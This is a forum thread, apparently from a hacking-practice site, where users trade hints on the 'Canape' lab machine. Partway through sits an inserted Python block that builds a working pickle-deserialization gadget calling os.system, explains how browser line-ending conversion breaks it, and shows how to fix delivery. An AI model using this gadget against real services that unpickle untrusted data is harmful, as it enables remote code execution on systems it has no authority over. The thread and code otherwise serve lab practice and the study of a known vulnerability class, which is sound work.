Canape

Could use some help… found the vector, stuck at creating the payload… how do you run multiple commands on the same line in Python? The plan is to make the initial string a comment, then the payload.

@genxweb said:
@SpicyCrack3r put the files in your web directory and do a wget to your IP/file to download them that way.

thx, the easy way was gone from my eyes

Advice for the initial foothold:
Try working on it locally first and get something basic working.

Agreed. Guys, this box is somehow refreshing … :slight_smile: Great time.

I have the app running locally but I still can’t get RCE. When I generate the payload for RCE and the app creates the .p file locally, then try to run it in my own Python interpreter with the “vulnerable” library and method, I get the following error:

ImportError: No module named os

Running dos2unix on the .p file containing the exploit fixes the issue. I still can’t get RCE because I think my exploit is being generated incorrectly (I’m doing it in Kali, so I have no idea why dos2unix has an effect), and this in turn isn’t working in the app. If I generate the payload and then execute it in the same script (i.e. non-interactively, bypassing the app altogether) it works fine. This is very frustrating and any help would be appreciated.

@mikekhusid said:
I have the app running locally but I still can’t get RCE. When I generate the payload for RCE and the app creates the .p file locally, then try to run it in my own Python interpreter with the “vulnerable” library and method, I get the following error:

ImportError: No module named os

Running dos2unix on the .p file containing the exploit fixes the issue. I still can’t get RCE because I think my exploit is being generated incorrectly (I’m doing it in Kali, so I have no idea why dos2unix has an effect), and this in turn isn’t working in the app. If I generate the payload and then execute it in the same script (i.e. non-interactively, bypassing the app altogether) it works fine. This is very frustrating and any help would be appreciated.

At this very moment I am at exactly the same spot (not with the chars, no need for dos2unix), though with some modifications I get BadPickleGet: 111. The reason you may have to pass it through dos2unix is that you need to understand what format the data is saved to the file in… check cPickle online…

This machine is awesome. I haven’t got a shell via RCE yet, but I love the way to hack it.

I’ve had a shell since yesterday; quite easy in the end. Now I’m on my way to impersonating another user to get user.txt… so far I’m having lots of fun with this one!

Well, after a short break, I got back to @canape. P0wned. For those who are struggling with it, here’s a tip: it’s easy. Once you’ve got a shell, the rest is like a walk in the park. As someone already said, the first foothold was fun. Then, pretty boring.

Any ideas about root? PM please

Stuck on Canape for a few days. Getting 500 Internal Server error. Anyone able to give me a nudge?

My earlier issue had to do with encoding.

@mikekhusid said:
I have the app running locally but I still can’t get RCE. When I generate the payload for RCE and the app creates the .p file locally, then try to run it in my own Python interpreter with the “vulnerable” library and method, I get the following error:

ImportError: No module named os

Running dos2unix on the .p file containing the exploit fixes the issue. I still can’t get RCE because I think my exploit is being generated incorrectly (I’m doing it in Kali, so I have no idea why dos2unix has an effect), and this in turn isn’t working in the app. If I generate the payload and then execute it in the same script (i.e. non-interactively, bypassing the app altogether) it works fine. This is very frustrating and any help would be appreciated.

This incredibly helpful message is usually caused by having the wrong line endings. Submitting multiline text in your browser that has Unix line endings (\n) usually ends up with the browser encoding it and changing the line endings into \r\n. If you look at the web request it probably has a %0D%0A in it; if that’s the case, just remove the %0Ds, since you only want Unix-style line endings, and that should fix the problem. Alternatively you can URL-encode your text first. (Sorry for the non-specific answer, but I’m trying not to give anything away.)
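The line-ending effect described in the reply above, and the "test it locally first" advice given earlier in the thread, as an added example that is not part of any post here and not code from the box: it builds the classic protocol-0 pickle gadget, shows what an unpickler does with the bytes after a browser has turned every \n into \r\n (the GLOBAL opcode reads the module name up to the newline, so it tries to import "posix\r" and fails with an ImportError whose trailing carriage return is invisible on a terminal), and shows the two fixes mentioned: strip the carriage returns, or percent-encode the bytes yourself so the request carries %0A and never %0D. The simulate_browser_form function is a constructed stand-in for the form submission, and the callables used are illustrative; nothing here is taken from the target.

```python
import os
import pickle
import urllib.parse


class Gadget:
    """Object whose __reduce__ makes the unpickler call an arbitrary callable.

    Loading the pickle runs callable_(*args). With os.system and a shell
    command this is the classic deserialization RCE gadget; the callable is
    a parameter so the same code can be exercised with something harmless.
    """

    def __init__(self, callable_, args):
        self.callable_ = callable_
        self.args = args

    def __reduce__(self):
        return (self.callable_, self.args)


def build_payload(callable_, args):
    """Serialise the gadget with protocol 0, the ASCII format in which the
    GLOBAL ('c'), PUT ('p') and UNICODE ('V') opcodes are each terminated by
    a single '\\n'. That newline is exactly what a browser form rewrites."""
    return pickle.dumps(Gadget(callable_, args), protocol=0)


def simulate_browser_form(payload):
    """Constructed stand-in for pasting a multiline value into a browser
    form: bare LF becomes CRLF before the request leaves the browser."""
    return payload.replace(b"\n", b"\r\n")


def strip_cr(data):
    """Fix 1 (what dos2unix does): drop the CRs so every opcode is again
    terminated by a bare LF. Safe for protocol 0 output, which escapes any
    '\\r' inside string values as \\u000d rather than emitting it raw."""
    return data.replace(b"\r\n", b"\n")


def url_encode(payload):
    """Fix 2: percent-encode the bytes yourself before submitting, so the
    newline travels as %0A and the browser has no raw newline to rewrite."""
    return urllib.parse.quote(payload, safe="")


def try_load(data):
    """Unpickle the bytes the way the target application would.

    Returns (True, result) on success or (False, 'ExcName: message') on
    failure, so the effect of a mangled stream can be inspected locally
    instead of as a bare 500 from the remote app."""
    try:
        return True, pickle.loads(data)
    except Exception as exc:  # ImportError, pickle.UnpicklingError, ...
        return False, "%s: %s" % (type(exc).__name__, exc)


if __name__ == "__main__":
    # The RCE form of the gadget: os.system("id") runs when the pickle loads.
    payload = build_payload(os.system, ("id",))
    print(repr(payload))
    mangled = simulate_browser_form(payload)
    print(try_load(mangled))            # (False, "...No module named 'posix\r'")
    print(try_load(strip_cr(mangled)))  # runs id, returns (True, 0)
    print(url_encode(payload))          # contains %0A, never %0D
```

Use try_load on the exact bytes you intend to submit (or on a copy of the .p file the application wrote) before blaming the payload generator: if the local unpickler reports a module name with a stray \r, the payload is fine and the transport is what needs fixing.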

Can anyone help me out with the initial first step on this box? I have exhausted everything with no luck for hours.

Stuck at privesc to user on the local machine. I found an interesting file but cannot crack the hash in it. Any hints?

Cannot make RCE work :frowning: I used a payload generator from GitHub. Boring is safe :frowning:

Feeling Good, got root. Hint for that box do not assume anything and read more. Try Harder !!!

@dmknght said:
Cannot make RCE work :frowning: I used a payload generator from GitHub. Boring is safe :frowning:

Not sure if you are talking about the initial foothold or a point further along, in the first case check how you are encoding whatever you have. If possible test it locally using whatever you have found and you will be able to see more info on why it is failing. I can’t really post more details here but feel free to message me with any questions about this box and I’ll give whatever hints I can (without spoiling anything of course).

@Ic3M4n said:

@dmknght said:
Cannot make RCE work :frowning: I used a payload generator from GitHub. Boring is safe :frowning:

Not sure if you are talking about the initial foothold or a point further along, in the first case check how you are encoding whatever you have. If possible test it locally using whatever you have found and you will be able to see more info on why it is failing. I can’t really post more details here but feel free to message me with any questions about this box and I’ll give whatever hints I can (without spoiling anything of course).

I think I did not use the right encoder. I also did not enumerate the machine and the information for the exploit enough. I am doing other boxes and will come back to this box when I feel ready. Thanks for your help :smiley:

DM me if you are stuck at privesc. I want to discuss it.